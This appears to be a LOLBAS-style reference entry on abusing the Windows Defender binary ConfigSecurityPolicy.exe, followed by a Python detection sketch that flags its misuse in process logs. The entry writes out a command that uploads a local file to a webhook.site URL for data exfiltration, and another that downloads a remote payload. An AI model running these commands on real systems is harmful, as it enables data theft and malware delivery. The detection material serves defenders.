.. /ConfigSecurityPolicy.exe

Binary part of Windows Defender. Used to manage settings in Windows Defender. You can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.


Paths:

Resources:
Acknowledgements:

Detection:

Upload

Upload file, credentials or data exfiltration in general
ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
Usecase: Upload file
Privileges required: User
OS: Windows 10
MITRE ATT&CK®: T1567



Download

Downloads a remote payload and places it in the cache folder (for example, %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE).
ConfigSecurityPolicy.exe https://example.com/payload
Usecase: Downloads payload from remote server
Privileges required: User
OS: Windows 10, Windows 11
MITRE ATT&CK®: T1105
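
Detection sketch for the two command-line forms above, as an added example that is not part of the original entry or of the LOLBAS project: it flags process-creation command lines where ConfigSecurityPolicy.exe receives a URL argument. The function names and the sample events are constructed for illustration.

```python
import re
from ntpath import basename  # Windows path rules on any host OS

URL_RE = re.compile(r"^https?://", re.IGNORECASE)
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')  # quoted token or bare token

def tokenize(cmdline):
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [quoted or bare for quoted, bare in TOKEN_RE.findall(cmdline)]

def classify(cmdline):
    """Return (usecase, ATT&CK id) for the two forms on this page, else None."""
    tokens = tokenize(cmdline)
    if not tokens or basename(tokens[0]).lower() != "configsecuritypolicy.exe":
        return None
    args = tokens[1:]
    url_pos = [i for i, arg in enumerate(args) if URL_RE.match(arg)]
    if not url_pos:
        return None  # no URL argument: not one of the two forms
    # Upload form: <local file> <URL>. Download form: <URL> alone.
    return ("upload", "T1567") if url_pos[0] > 0 else ("download", "T1105")

# Constructed process-creation command lines (not real telemetry).
SAMPLE_EVENTS = [
    r"ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile",
    r"ConfigSecurityPolicy.exe https://example.com/payload",
    r'"C:\Example Dir\ConfigSecurityPolicy.exe" C:\Example\policy.xml',  # hypothetical, no URL
    r"curl.exe https://example.com/payload",  # different image
]

def scan(events):
    """Return [(cmdline, (usecase, technique)), ...] for matching events."""
    return [(e, hit) for e in events if (hit := classify(e))]

if __name__ == "__main__":
    for cmdline, (usecase, technique) in scan(SAMPLE_EVENTS):
        print(f"{technique} {usecase}: {cmdline}")
```

A hit on the download form can be corroborated by a file-creation event from the same process under the cache folder named in the Download entry.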